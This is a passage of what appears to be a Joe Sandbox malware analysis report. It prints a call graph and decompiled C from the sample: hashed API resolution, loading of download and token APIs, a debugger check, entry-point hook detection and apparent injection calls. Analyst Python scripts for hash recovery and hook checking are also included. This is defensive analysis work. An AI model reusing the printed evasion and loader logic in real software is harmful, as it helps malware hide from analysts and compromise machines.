24764->24907 24767 288e942 24765->24767 24768 288e9e8 24767->24768 24767->24773 24901 2862fda 24767->24901 24770 288ea02 DispatchMessageA 24768->24770 24771 288ea1e 24768->24771 24770->24768 24772 28617e4 RtlFreeHeap 24771->24772 24771->24773 24772->24773 24773->24726 24775 28800fe 24774->24775 24778 2880105 24774->24778 24775->24726 24776 288028c Sleep 24776->24778 24778->24775 24778->24776 24912 28802bf 24778->24912 24780 2861803 NtTerminateThread 24779->24780 24781 28617ed 24779->24781 24780->24718 24781->24780 24782 28617f7 RtlFreeHeap 24781->24782 24782->24780 24784 2864c79 24783->24784 24819 2864b40 24784->24819 24786 2864c88 24786->24745 24788 288a84e 24787->24788 24789 288a7c4 24787->24789 24788->24745 24789->24788 24790 288a845 RegCloseKey 24789->24790 24790->24788 24793 288a2b4 24791->24793 24792 288a35a 24792->24745 24793->24792 24829 2862bcc 24793->24829 24795 288a335 24796 2862bcc RtlFreeHeap 24795->24796 24796->24792 24798 288a47f 24797->24798 24799 288a548 CreateFileW 24798->24799 24805 288a484 24798->24805 24800 288a584 24799->24800 24800->24805 24834 288a365 24800->24834 24803 288a627 24806 28834cf 5 API calls 24803->24806 24805->24745 24806->24805 24808 28834e7 24807->24808 24810 2883528 24808->24810 24812 288363d Sleep 24808->24812 24852 28833de 24808->24852 24811 28667b5 RtlFreeHeap 24810->24811 24810->24812 24813 28835ba 24810->24813 24815 288357a 24811->24815 24812->24747 24813->24812 24861 28667b5 24813->24861 24815->24813 24867 286668f RtlFreeHeap 24815->24867 24817 28835fd 24817->24812 24868 286668f RtlFreeHeap 24817->24868 24820 2864c50 24819->24820 24821 2864b57 24819->24821 24820->24786 24821->24820 24822 2864bb0 GetTokenInformation 24821->24822 24823 2864bc5 24822->24823 24824 2864c42 24822->24824 24823->24824 24826 2864bde GetTokenInformation 24823->24826 24824->24820 24825 2864c47 FindCloseChangeNotification 24824->24825 24825->24820 24828 2864bf5 24826->24828 24827 28617e4 RtlFreeHeap 24827->24824 24828->24827 24830 2862bdc 
24829->24830 24831 2862c61 24829->24831 24830->24831 24833 286668f RtlFreeHeap 24830->24833 24831->24795 24833->24831 24835 288a381 24834->24835 24845 288dc1d 24835->24845 24837 288a3ad 24838 288dc1d GetFileAttributesW 24837->24838 24839 288a40a 24838->24839 24848 288de6c 24839->24848 24842 288a456 24842->24805 24844 288365b RtlFreeHeap 24842->24844 24843 288a294 RtlFreeHeap 24843->24842 24844->24803 24846 288dc32 GetFileAttributesW 24845->24846 24847 288dc26 24845->24847 24846->24847 24847->24837 24849 288a44b 24848->24849 24850 288de7b 24848->24850 24849->24842 24849->24843 24850->24849 24851 288deaf DeleteFileW 24850->24851 24851->24849 24853 28833f4 24852->24853 24854 28833f9 24853->24854 24855 2883405 GetFileAttributesW 24853->24855 24854->24810 24856 2883419 SetFileAttributesW 24855->24856 24857 288342b CreateFileW 24855->24857 24856->24857 24858 288344f 24857->24858 24859 288345a SetFileAttributesW 24858->24859 24860 288346c 24858->24860 24859->24860 24860->24810 24862 28667c4 24861->24862 24863 28667ea 24862->24863 24869 286171c 24862->24869 24863->24817 24865 28667d3 24865->24863 24866 28617e4 RtlFreeHeap 24865->24866 24866->24863 24867->24813 24868->24812 24870 2861725 24869->24870 24871 2861729 24869->24871 24870->24865 24871->24870 24872 28617e4 RtlFreeHeap 24871->24872 24872->24870 24874 288554f 24873->24874 24874->24753 24878 288386b 24875->24878 24877 2883854 24877->24760 24879 28838a1 24878->24879 24880 288dc1d GetFileAttributesW 24879->24880 24881 288394c 24879->24881 24885 2883902 24879->24885 24880->24881 24882 28837c3 2 API calls 24881->24882 24884 2883a8b 24881->24884 24881->24885 24882->24884 24884->24885 24886 2883b41 24884->24886 24887 2883b83 24884->24887 24890 2883b68 24884->24890 24885->24877 24886->24890 24895 2862722 24886->24895 24888 2862722 2 API calls 24887->24888 24887->24890 24888->24890 24890->24885 24891 28837c3 24890->24891 24892 28837d1 24891->24892 24894 28837f5 24891->24894 24893 2862722 2 API calls 24892->24893 24892->24894 
24893->24894 24894->24885 24896 2862791 24895->24896 24897 2862731 24895->24897 24896->24890 24897->24896 24898 2862742 RegCreateKeyExW 24897->24898 24898->24896 24899 2862760 24898->24899 24900 2862784 RegCloseKey 24899->24900 24900->24896 24902 28630ba 24901->24902 24903 2862ff3 24901->24903 24902->24768 24903->24902 24904 28617e4 RtlFreeHeap 24903->24904 24905 28630a3 24904->24905 24905->24902 24908 286295b 24905->24908 24907->24763 24909 286296a 24908->24909 24911 2862994 24908->24911 24910 2862976 RegCreateKeyExA 24909->24910 24909->24911 24910->24911 24911->24902 24913 28802ed 24912->24913 24914 2880301 CreateToolhelp32Snapshot 24913->24914 24919 2880340 24913->24919 24915 2880315 24914->24915 24914->24919 24916 288032c Process32FirstW 24915->24916 24924 2863d40 24915->24924 24916->24919 24920 2880350 24916->24920 24918 288048e Process32NextW 24918->24919 24918->24920 24919->24778 24920->24918 24930 288ad40 24920->24930 24936 2881aaa 24920->24936 24965 28739f1 RtlFreeHeap 24920->24965 24925 2863d52 24924->24925 24927 2863d4e 24924->24927 24926 2863d67 LookupPrivilegeValueA 24925->24926 24925->24927 24926->24927 24928 2863d8b AdjustTokenPrivileges 24926->24928 24927->24916 24928->24927 24929 2863db4 FindCloseChangeNotification 24928->24929 24929->24927 24931 288ad52 24930->24931 24932 288ad4e 24930->24932 24931->24932 24966 28644a2 24931->24966 24932->24920 24937 2881abc 24936->24937 24940 2881b95 24937->24940 24964 2881aca 24937->24964 25000 2863e38 RtlFreeHeap 24937->25000 24939 2881be6 24941 28821b7 VirtualFree 24939->24941 24945 28821c7 24939->24945 24940->24939 24942 2864c5d 4 API calls 24940->24942 24940->24964 24941->24945 24943 2881c16 24942->24943 24943->24939 24944 28644a2 NtQueryInformationProcess 24943->24944 24948 2881c30 24944->24948 24946 28617e4 RtlFreeHeap 24945->24946 24945->24964 24946->24964 24947 2881c55 24947->24939 24956 2881d0b 24947->24956 24977 2864cd0 24947->24977 24948->24939 24948->24947 24971 28644f0 24948->24971 24951 2881c78 
24980 2864e69 24951->24980 24956->24939 24989 2880d68 24956->24989 24957 2881e56 24957->24939 24995 288058a 24957->24995 24960 2881f87 24961 288211d VirtualFree 24960->24961 24962 2882136 24961->24962 24963 28617e4 RtlFreeHeap 24962->24963 24963->24964 24964->24920 24965->24920 24967 28644af 24966->24967 24968 28644bb 24966->24968 24967->24968 24969 28644c0 NtQueryInformationProcess 24967->24969 24968->24932 24970 288adb6 7 API calls 24968->24970 24969->24968 24970->24932 24972 2864547 24971->24972 24973 28644fe 24971->24973 24972->24947 24974 2864510 NtQueryInformationProcess 24973->24974 24974->24972 24975 2864529 24974->24975 24975->24972 24976 286452e NtQueryInformationProcess 24975->24976 24976->24972 25002 2864d86 24977->25002 24979 2864ce3 24979->24951 24981 2864e76 24980->24981 24982 2864ee1 24980->24982 24981->24982 24983 2864ee7 24981->24983 24984 2864e83 24981->24984 24982->24956 25001 287ff99 RtlFreeHeap 24982->25001 25010 2864def RtlFreeHeap 24983->25010 24984->24982 24986 2864e9a NtQueryInformationProcess 24984->24986 24988 2864eb3 24986->24988 24987 28617e4 RtlFreeHeap 24987->24982 24988->24987 24990 2880d98 24989->24990 24991 2880d74 24989->24991 24990->24957 24991->24990 24992 2880e09 NtCreateSection 24991->24992 24994 2880e38 24992->24994 24993 2880f2e NtClose 24993->24990 24994->24990 24994->24993 24996 2880717 24995->24996 24997 288059b 24995->24997 24996->24939 24996->24960 24997->24996 24998 28806f3 DuplicateHandle 24997->24998 24998->24996 24999 288070e FindCloseChangeNotification 24998->24999 24999->24996 25000->24940 25001->24956 25003 2864d9f 25002->25003 25004 2864d9b 25002->25004 25006 2864d45 25003->25006 25004->24979 25007 2864d55 25006->25007 25008 2864d7b 25006->25008 25009 2864d62 NtQueryInformationProcess 25007->25009 25008->25004 25009->25008 25010->24982 26105 28771b2 RtlFreeHeap RegCreateKeyExA RegCloseKey ObtainUserAgentString 26108 288bdb3 RtlFreeHeap getaddrinfo socket 26109 28725ba 15 API calls 26067 28868ce RtlFreeHeap 
NtQueryInformationProcess 24709 2881beb RtlFreeHeap VirtualFree 26120 2870d04 PostMessageA 26122 288d102 RtlFreeHeap RegCloseKey CreateThread FindCloseChangeNotification 26078 2884004 14 API calls 26123 287e30a RtlFreeHeap RegCloseKey 26124 288d11b 11 API calls 26081 287e210 GetPriorityClass SetPriorityClass SetPriorityClass 25013 288eb26 25014 288eb8b 25013->25014 25016 288eb3d 25013->25016 25015 288ebcc 25014->25015 25018 288eb90 25014->25018 25035 288f28e RtlFreeHeap RegCloseKey RegCreateKeyExA 25015->25035 25019 288eb68 25016->25019 25029 288eb89 25016->25029 25030 28884a2 25016->25030 25018->25029 25034 288f18d 20 API calls 25018->25034 25021 288a7af RegCloseKey 25019->25021 25022 288eb78 25021->25022 25023 288a365 3 API calls 25022->25023 25025 288eb7f 25023->25025 25026 288a20e 3 API calls 25025->25026 25027 288eb84 25026->25027 25028 28834cf 5 API calls 25027->25028 25028->25029 25031 28884b5 25030->25031 25032 288dc1d GetFileAttributesW 25031->25032 25033 28884c0 25031->25033 25032->25033 25033->25019 25034->25029 25035->25029 26038 2874e3b 26039 2874e49 26038->26039 26042 2874e5f 26038->26042 26039->26042 26044 2874d81 26039->26044 26041 2874e5b 26041->26042 26043 2865b07 RtlFreeHeap 26041->26043 26043->26042 26045 2874d9b 26044->26045 26047 2874ddc 26045->26047 26048 2865c1d RtlFreeHeap 26045->26048 26047->26041 26048->26047 26088 2880e43 NtClose 26132 287374b RtlFreeHeap CreateThread FindCloseChangeNotification 26089 287e456 6 API calls 26136 286c355 GetFileAttributesW 26091 28765fa RtlFreeHeap RegCreateKeyExA RegCloseKey 26094 287466e RtlFreeHeap 26097 287d07f RtlFreeHeap ObtainUserAgentString getaddrinfo 26140 287a77c 20 API calls 26098 2884876 88 API calls 26141 2873779 RtlFreeHeap RegCloseKey GetTimeZoneInformation

                        Control-flow Graph

                        C-Code - Quality: 45%
                        			E028664BF(intOrPtr __ecx) {
                        				intOrPtr _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				struct HINSTANCE__* _v20;
                        				intOrPtr _v24;
                        				struct HINSTANCE__* _v28;
                        				intOrPtr _v32;
                        				intOrPtr _t28;
                        				intOrPtr _t29;
                        				intOrPtr _t30;
                        				intOrPtr _t31;
                        				struct HINSTANCE__* _t32;
                        				struct HINSTANCE__* _t33;
                        				_Unknown_base(*)()* _t35;
                        
                        				_t55 = __ecx;
                        				_v32 = __ecx;
                        				_t28 =  *0x2899648; // 0x77090000: ntdll.dll image base (paired with "ntdll.dll" below)
                        				_v12 = _t28;
                        				_t29 =  *0x2899670; // 0x76670000: kernel32.dll image base
                        				_v8 = _t29;
                        				_t30 =  *0x28996e8; // 0x762b0000: user32.dll image base (ChangeWindowMessageFilter is a user32 export)
                        				_v16 = _t30;
                        				_t31 =  *0x2899710; // 0x76170000: advapi32.dll image base (CreateProcessWithTokenW is an advapi32 export)
                        				_v24 = _t31;
                        				if(_v12 != 0) {
                        					// E02884E36 receives the module base, the module name and a 32-bit constant:
                        					// the export is selected by a hash of its name, so the targeted API names do
                        					// not appear as strings. The hash routine itself is not part of this excerpt.
                        					 *0x289f55c = E02884E36(_v12, __ecx, "ntdll.dll", 0x583d0800, 0);
                        					 *0x289f560 = E02884E36(_v12, _t55, "ntdll.dll", 0x860e09f1, 0);
                        					 *0x289f568 = E02884E36(_v12, _t55, "ntdll.dll", 0x856309fa, 0);
                        					 *0x289f56c = E02884E36(_v12, _t55, "ntdll.dll", 0x7bb00997, 0);
                        					// *0x289f928 is a global function pointer called as (module base, export name),
                        					// i.e. a GetProcAddress-style resolver; only this one ntdll export is named in clear.
                        					 *0x289f564 =  *0x289f928(_v12, "CsrGetProcessId");
                        				}
                        				if(_v8 != 0) {
                        					 *0x289f54c = E02884E36(_v8, _t55, "kernel32.dll", 0xb30b0b4e, 0);
                        					 *0x289f550 = E02884E36(_v8, _t55, "kernel32.dll", 0x6bf308a4, 0);
                        					 *0x289f534 =  *0x289f928(_v8, "InitializeProcThreadAttributeList");
                        					 *0x289f538 =  *0x289f928(_v8, "UpdateProcThreadAttribute");
                        				}
                        				if(_v16 != 0) {
                        					 *0x289f544 =  *0x289f928(_v16, "ChangeWindowMessageFilter");
                        				}
                        				if(_v24 != 0) {
                        					 *0x289f548 =  *0x289f928(_v24, "CreateProcessWithTokenW");
                        				}
                        				_t32 = LoadLibraryA("Urlmon.dll"); // executed
                        				_v28 = _t32;
                        				if(_v28 != 0) {
                        					 *0x289f53c =  *0x289f928(_v28, "ObtainUserAgentString");
                        					 *0x289f540 =  *0x289f928(_v28, "URLDownloadToFileW");
                        				}
                        				_t33 = LoadLibraryA("Netapi32.dll"); // executed
                        				_v20 = _t33;
                        				if(_v20 != 0) {
                        					_t35 = GetProcAddress(_v20, "NetUserGetInfo"); // executed
                        					 *0x289f554 = _t35;
                        				}
                        				return 1;
                        			}

                        Instruction addresses for the listing above: 0x028664bf through 0x02866659 (per-line address column of the decompiler view).

                        APIs
                        • LoadLibraryA.KERNEL32(Urlmon.dll), ref: 028665FA
                        • LoadLibraryA.KERNEL32(Netapi32.dll), ref: 02866634
                        • GetProcAddress.KERNEL32(00000000,NetUserGetInfo), ref: 0286664B
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad$AddressProc
                        • String ID: ChangeWindowMessageFilter$CreateProcessWithTokenW$CsrGetProcessId$InitializeProcThreadAttributeList$NetUserGetInfo$Netapi32.dll$ObtainUserAgentString$URLDownloadToFileW$UpdateProcThreadAttribute$Urlmon.dll$kernel32.dll$ntdll.dll
                        • API String ID: 1469910268-2909713016
                        • Opcode ID: 4d7ca609706e5604d8a048532d6d4613086eca4d0a8594caf50407832d67790a
                        • Instruction ID: 5b2c7c6eaae3a2e126e806c1343a82d76f7095ff538924e8761b0ae883dff65b
                        • Opcode Fuzzy Hash: 4d7ca609706e5604d8a048532d6d4613086eca4d0a8594caf50407832d67790a
                        • Instruction Fuzzy Hash: E741D97DE81205FFEB25EF64ED49BADBBB0EB14711F180825E502E2690E7741A61CF44
                        Uniqueness

                        Uniqueness Score: -1.00%
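The listing of E028664BF above resolves its ntdll and kernel32 imports through E02884E36 with a 32-bit constant per export instead of a name, which is why those APIs are missing from the function's String ID list while CsrGetProcessId and the Urlmon/Netapi32 names are passed in clear. Recovering what the constants denote means re-implementing the sample's hash routine (E02884E36, not shown in this excerpt) and hashing every export of the named DLL until one matches. The Python script below is an added example, not code from the report or from the sample: it runs several common export-name hashes over a constructed, deliberately short export list and reports which constants match. The hash functions are candidates only; the sample's real routine, and therefore whether any of the listed constants match here, is unknown.

```python
"""Brute-force candidate export-name hashes against known DLL exports.

Added example, not part of the sandbox report or the sample. The hash
routine in the sample (E02884E36) is not shown in the excerpt, so the
algorithms below are common candidates, not the confirmed one.
"""
import zlib
from typing import Callable, Dict, Iterable, Tuple

MASK32 = 0xFFFFFFFF


def ror32(value: int, count: int) -> int:
    """Rotate a 32-bit value right by count bits."""
    count &= 31
    return ((value >> count) | (value << (32 - count))) & MASK32


def hash_ror13(name: str) -> int:
    """Classic shellcode hash: h = ror(h, 13) + byte for each byte, NUL excluded."""
    h = 0
    for byte in name.encode("ascii"):
        h = (ror32(h, 13) + byte) & MASK32
    return h


def hash_ror13_nul(name: str) -> int:
    """Same loop, but folds in the terminating NUL byte (ror by 13, add 0)."""
    return ror32(hash_ror13(name), 13)


def hash_djb2(name: str) -> int:
    """djb2: h = h * 33 + byte, starting at 5381."""
    h = 5381
    for byte in name.encode("ascii"):
        h = (h * 33 + byte) & MASK32
    return h


def hash_crc32(name: str) -> int:
    """Standard CRC-32 of the export name."""
    return zlib.crc32(name.encode("ascii")) & MASK32


CANDIDATE_HASHES: Dict[str, Callable[[str], int]] = {
    "ror13": hash_ror13,
    "ror13_nul": hash_ror13_nul,
    "djb2": hash_djb2,
    "crc32": hash_crc32,
}

# Constants copied from the E028664BF listing, grouped by the DLL they are resolved in.
LISTING_TARGETS: Dict[str, Iterable[int]] = {
    "ntdll.dll": (0x583D0800, 0x860E09F1, 0x856309FA, 0x7BB00997),
    "kernel32.dll": (0xB30B0B4E, 0x6BF308A4),
}

# Constructed, deliberately short export list (assumption for the demo). A real
# run would take every name from each DLL's export directory, e.g. via pefile.
SAMPLE_EXPORTS: Dict[str, Tuple[str, ...]] = {
    "ntdll.dll": ("NtQueryInformationProcess", "NtSetInformationThread",
                  "NtCreateSection", "NtClose", "NtTerminateThread",
                  "RtlFreeHeap", "CsrGetProcessId"),
    "kernel32.dll": ("LoadLibraryA", "GetProcAddress", "CreateToolhelp32Snapshot",
                     "Process32FirstW", "VirtualFree", "DuplicateHandle",
                     "InitializeProcThreadAttributeList"),
}


def build_lookup(exports: Dict[str, Iterable[str]]) -> Dict[Tuple[str, str, int], str]:
    """Map (algorithm, dll, hash) -> export name for every candidate algorithm."""
    lookup: Dict[Tuple[str, str, int], str] = {}
    for dll, names in exports.items():
        for name in names:
            for algo, fn in CANDIDATE_HASHES.items():
                lookup[(algo, dll, fn(name))] = name
    return lookup


def resolve_hashes(targets: Dict[str, Iterable[int]],
                   exports: Dict[str, Iterable[str]]) -> Dict[int, Tuple[str, str, str]]:
    """Return {hash: (algorithm, dll, export)} for every constant that matches."""
    lookup = build_lookup(exports)
    found: Dict[int, Tuple[str, str, str]] = {}
    for dll, hashes in targets.items():
        for h in hashes:
            for algo in CANDIDATE_HASHES:
                name = lookup.get((algo, dll, h))
                if name is not None:
                    found[h] = (algo, dll, name)
    return found


if __name__ == "__main__":
    hits = resolve_hashes(LISTING_TARGETS, SAMPLE_EXPORTS)
    for dll, hashes in LISTING_TARGETS.items():
        for h in hashes:
            algo, _, name = hits.get(h, ("no match", dll, "?"))
            print(f"{dll:13} 0x{h:08x} -> {name} ({algo})")
```

If none of the listing's constants match, that is the expected outcome: the next step is to lift the loop from E02884E36 into a new entry in CANDIDATE_HASHES (some families hash the module name together with the export, lower-case the name first, or fold in the NUL terminator, as the ror13_nul variant does) and re-run against the full export tables of the Windows build the sample targets.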

                        Control-flow Graph

                        C-Code - Quality: 29%
                        			E0286DB20(long __eax, void* __ecx, void* __edx, void* __eflags) {
                        				char _v5;
                        				void _v12;
                        				long _v16;
                        				void* __edi;
                        				void* _t17;
                        				long _t21;
                        				intOrPtr _t22;
                        				intOrPtr _t23;
                        				intOrPtr _t24;
                        				intOrPtr _t25;
                        				intOrPtr _t55;
                        				void* _t60;
                        				long _t61;
                        				void* _t69;
                        				long _t73;
                        				void* _t85;
                        				intOrPtr _t87;
                        				void* _t89;
                        				void* _t90;
                        				long _t95;
                        
                        				_t90 = __edx;
                        				_t89 = __ecx;
                        				_t95 = __eax;
                        				_v5 = 0;
                        				 *0x289fdb4 =  *0x289f6f8(); // executed
                        				_t17 = E0286E6A4(__eax); // executed
                        				if(_t17 != 0) {
                        					 *0x289f8b0(0x289f310, 0xfa0); // indirect call with (global, 4000); likely InitializeCriticalSectionAndSpinCount (assumption, callee not shown here)
                        					_v12 = 0;
                        					_v16 = 0;
                        					// Debugger check: handle -1 is the current process and information class 7 is
                        					// ProcessDebugPort; a non-zero port means a debugger is attached to the process.
                        					_t21 = NtQueryInformationProcess(0xffffffff, 7,  &_v12, 4,  &_v16); // executed
                        					__eflags = _t21;
                        					if(_t21 >= 0) {
                        						__eflags = _v12;
                        						if(_v12 != 0) {
                        							_v5 = 1; // debugger-present flag, kept for the rest of the function
                        						}
                        					}
                        					_t22 =  *0x289f8cc("ntdll.dll");
                        					 *0x289fdbc = _t22;
                        					_t23 =  *0x289f8cc("kernel32.dll");
                        					 *0x289f2e4 = _t23;
                        					_t24 =  *0x289f8cc("user32.dll");
                        					 *0x289fdc0 = _t24;
                        					_t25 =  *0x289f8cc("ws2_32.dll");
                        					 *0x289fdc4 = _t25;
                        					 *0x289eecc =  *0x289f8cc("wininet.dll");
                        					 *0x289f818( *0x289f2e8 + 0x2656); // executed
                        					E02865446(_t89); // executed
                        					 *0x289fc54(0, 0x801a, 0, 0,  *0x289f2e8 + 0x37e); // executed
                        					 *0x289fc54(0, 0x8028, 0, 0,  *0x289f2e8 + 0x176); // executed
                        					 *0x289fc54(0, 0x8023, 0, 0,  *0x289f2e8 + 0x586); // executed
                        					 *0x289fc54(0, 0x800d, 0, 0,  *0x289f2e8 + 0x996); // executed
                        					 *0x289fc54(0, 0x800e, 0, 0,  *0x289f2e8 + 0xb9e); // executed
                        					 *0x289fc54(0, 0x8027, 0, 0,  *0x289f2e8 + 0x78e); // executed
                        					 *0x289fc54(0, 0x8026, 0, 0,  *0x289f2e8 + 0xda6); // executed
                        					 *0x289fc54(0, 0x802a, 0, 0,  *0x289f2e8 + 0xfae); // executed
                        					_t55 = E0286CEBA(_t89); // executed
                        					 *0x289f2f0 = _t55;
                        					 *0x289f2f4 = E0286D035(_t90, __eflags); // executed
                        					E0286D269(_t89, _t90, __eflags); // executed
                        					_t60 = E0286D774( *( *0x289f2e8 + 4) & 0x0000ffff);
                        					__eflags = _t60 - 1;
                        					if(_t60 != 1) {
                        						 *0x289fdb8 = 0;
                        					} else {
                        						_t87 = E0286D0AF(_t89); // executed
                        						 *0x289fdb8 = _t87;
                        					}
                        					_t61 =  *0x289f928( *0x289f2e4, "K32GetMappedFileNameW");
                        					 *0x289f54c = _t61;
                        					__eflags = _t61;
                        					if(_t61 == 0) {
                        						_t85 =  *0x289f914("Psapi.dll");
                        						 *0x289f54c =  *0x289f928(_t85, "GetMappedFileNameW");
                        					}
                        					E028614DB(_t89, 0x28a0028, 0, 0x18);
                        					 *0x289f8b0(0x28a0028, 0x3e8); // executed
                        					E02889F3B(); // executed
                        					E0287FDBF();
                        					E028883B6(_t89,  *0x289f2e8 + 0x216e);
                        					_t69 = E0286D774( *( *0x289f2e8 + 4) & 0x0000ffff);
                        					__eflags = _t69 - 1;
                        					if(_t69 == 1) {
                        						E02862313(_t89);
                        					}
                        					E028614DB(_t89,  *0x289f2e8 + 0x261a, 0, 0x3c);
                        					__eflags = _t95;
                        					if(_t95 == 0) {
                        						L16:
                        						_t73 = E02870623(_t89);
                        						__eflags = _t73;
                        						if(_t73 == 0) {
                        							goto L1;
                        						}
                        						goto L17;
                        					} else {
                        						__eflags =  *_t95 - 0x2672;
                        						if( *_t95 != 0x2672) {
                        							goto L16;
                        						}
                        						__eflags =  *(_t95 + 0x261e);
                        						if( *(_t95 + 0x261e) == 0) {
                        							goto L16;
                        						}
                        						E02861493(_t89,  *0x289f2e8 + 0x261a, _t95, 0x3c);
                        						L17:
                        						__eflags = _v5 - 1;
                        						if(_v5 == 1) {
                        							_v16 =  *0x289f590;
                        							_push(_t89);
                        							_push(_t90);
							__eflags =  *[fs:0xc0]; // fs:[0xc0] = TEB.WOW32Reserved, the WoW64 system-call gate
                        							if( *[fs:0xc0] == 0) {
                        								__eflags = 0;
                        							} else {
                        								 *[fs:0xc0] = _v16;
                        							}
                        						}
                        						return 1;
                        					}
                        				}
                        				L1:
                        				return 0;
                        			}
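Two self-checks in this dump are worth reproducing for an analyst: E0286DB20 above queries ProcessDebugPort and remembers the result in _v5, and E0286E06B below refuses to continue when the first byte at its entry point or at E0288489C is 0xE8 (call rel32), 0xE9 (jmp rel32) or 0xEB (jmp rel8), i.e. when a hook or sandbox trampoline has been planted on the function. The Python below is an added example written for this report, not code from the sample or from Joe Sandbox. It reproduces the prologue test over a constructed code image and goes beyond the sample by decoding the detour target, so an analyst can see which instrumentation hooks would trip the check. The base address 0x02860000 matches the dump base shown in this report; the image bytes and the entry-point offsets are constructed.

```python
"""Detour-prologue check over a dumped code image (added example)."""
import struct

# Opcodes the sample rejects at an entry point.
CALL_REL32 = 0xE8   # call rel32, 5 bytes
JMP_REL32 = 0xE9    # jmp rel32, 5 bytes
JMP_REL8 = 0xEB     # jmp rel8, 2 bytes


def detour_target(image: bytes, base: int, offset: int):
    """Return (mnemonic, target_va) if the instruction at `offset` is one
    of the call/jmp forms a detour leaves behind, else None.

    The target is computed relative to the end of the instruction, as the
    CPU does; the sample itself only tests the opcode byte.
    """
    op = image[offset]
    if op in (CALL_REL32, JMP_REL32):
        rel = struct.unpack_from("<i", image, offset + 1)[0]
        target = (base + offset + 5 + rel) & 0xFFFFFFFF
        return ("call" if op == CALL_REL32 else "jmp", target)
    if op == JMP_REL8:
        rel = struct.unpack_from("<b", image, offset + 1)[0]
        target = (base + offset + 2 + rel) & 0xFFFFFFFF
        return ("jmp short", target)
    return None


def scan_entry_points(image: bytes, base: int, offsets):
    """Apply the sample's test to several entry points.

    Returns a list of (offset, mnemonic, target) for every entry that
    starts with E8/E9/EB. An empty list means the sample would proceed.
    """
    hits = []
    for off in offsets:
        found = detour_target(image, base, off)
        if found is not None:
            hits.append((off, found[0], found[1]))
    return hits


def build_sample_image() -> bytes:
    """Constructed 32-byte image at base 0x02860000 (not from the sample):
    offset 0x00: clean prologue   push ebp; mov ebp, esp; sub esp, 0x10
    offset 0x10: hooked prologue  jmp rel32 -> 0x02870000
    offset 0x18: short jump       jmp short +4
    """
    base = 0x02860000
    img = bytearray(32)
    img[0:6] = bytes([0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x10])
    img[0x10] = JMP_REL32
    struct.pack_into("<i", img, 0x11, 0x02870000 - (base + 0x10 + 5))
    img[0x18] = JMP_REL8
    img[0x19] = 0x04
    return bytes(img)


if __name__ == "__main__":
    image = build_sample_image()
    for off, mnem, target in scan_entry_points(image, 0x02860000, [0x00, 0x10, 0x18]):
        print(f"entry +0x{off:02x}: {mnem} -> 0x{target:08x} (sample would abort)")
```

Run against a real dump, replace `build_sample_image()` with the bytes of the `.sdmp` file listed under Memory Dump Source and pass the RVAs of the entry point and of E0288489C; any hit is a prologue the sample's check at the top of E0286E06B would reject.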

                        Instruction addresses: one entry per C-code line, from 0x0286db20 to 0x0286ddf8 (address column not reproduced)


                        APIs
                          • Part of subcall function 0286E6A4: GetLongPathNameW.KERNEL32(?,?,00000143,00000103,?,00000208,?,00000208,00002672,028A0044), ref: 0286E733
                        • NtQueryInformationProcess.NTDLL(000000FF,00000007,?,00000004,?,?,?,0286E0A9), ref: 0286DB70
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: InformationLongNamePathProcessQuery
                        • String ID: GetMappedFileNameW$K32GetMappedFileNameW$Psapi.dll$kernel32.dll$ntdll.dll$user32.dll$wininet.dll$ws2_32.dll
                        • API String ID: 2350871506-302390598
                        • Opcode ID: bc250c8576a53650dde276481891e110ab775400c2f65c1c1c374f17921be708
                        • Instruction ID: 0b24e44dd983107eee922a4a6880b4890cddd51323e299dbabf0493ab18bb656
                        • Opcode Fuzzy Hash: bc250c8576a53650dde276481891e110ab775400c2f65c1c1c374f17921be708
                        • Instruction Fuzzy Hash: 5171A2BCE80204BFE714AFA8EC4CE7937ADE725309F184815B745D66C1CA7898648F61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        control_flow_graph: basic blocks 286e06b to 286e4fc (rendered graph; edge list not reproduced)
                        C-Code - Quality: 74%
                        			E0286E06B(void* __ecx, signed int __edx, void* __eflags, long _a4) {
                        				char _v9;
                        				signed int _v10;
                        				signed int _v11;
                        				char _v12;
                        				void _v16;
                        				char _v20;
                        				long _v24;
                        				char _v544;
                        				void* __ebx;
                        				void* __edi;
                        				void* _t84;
                        				intOrPtr _t86;
                        				intOrPtr _t88;
                        				void* _t93;
                        				signed int _t96;
                        				signed int _t98;
                        				void* _t103;
                        				signed int _t106;
                        				void* _t108;
                        				void* _t119;
                        				unsigned int _t122;
                        				void* _t127;
                        				void* _t129;
                        				signed int _t132;
                        				signed int _t137;
                        				void* _t138;
                        				intOrPtr* _t144;
                        				intOrPtr _t145;
                        				signed int _t150;
                        				signed int _t158;
                        				signed int _t159;
                        				signed int _t161;
                        				signed int _t162;
                        				void* _t164;
                        				signed int _t166;
                        				void* _t168;
                        				void* _t170;
                        				signed int _t171;
                        				signed int _t172;
                        				signed int _t175;
                        				void* _t177;
                        				void* _t179;
                        				signed int _t180;
                        				intOrPtr _t188;
                        				signed int _t189;
                        				signed int _t191;
                        				intOrPtr _t192;
                        				intOrPtr _t198;
                        				signed int _t203;
                        				void* _t204;
                        
                        				_t204 = __eflags;
                        				_t197 = __edx;
                        				_v10 = 1;
                        				_v11 = 0;
                        				_v9 = 0;
                        				_t203 = 0;
                        				_v20 = 0;
                        				 *0x289f968( *0x289ec4a, 0x4d2);
                        				_v12 = E02867DE0();
                        				_t84 = E0286DB20(_a4, __ecx, __edx, _t204); // executed
                        				if(_t84 != 0) {
					_t86 =  *_entry_; // first opcode byte at the module entry point
					_t187 = E0288489C;
					__eflags = _t86 - 0xe9;
					if(_t86 == 0xe9) { // 0xe9 = jmp rel32: entry point has been detoured
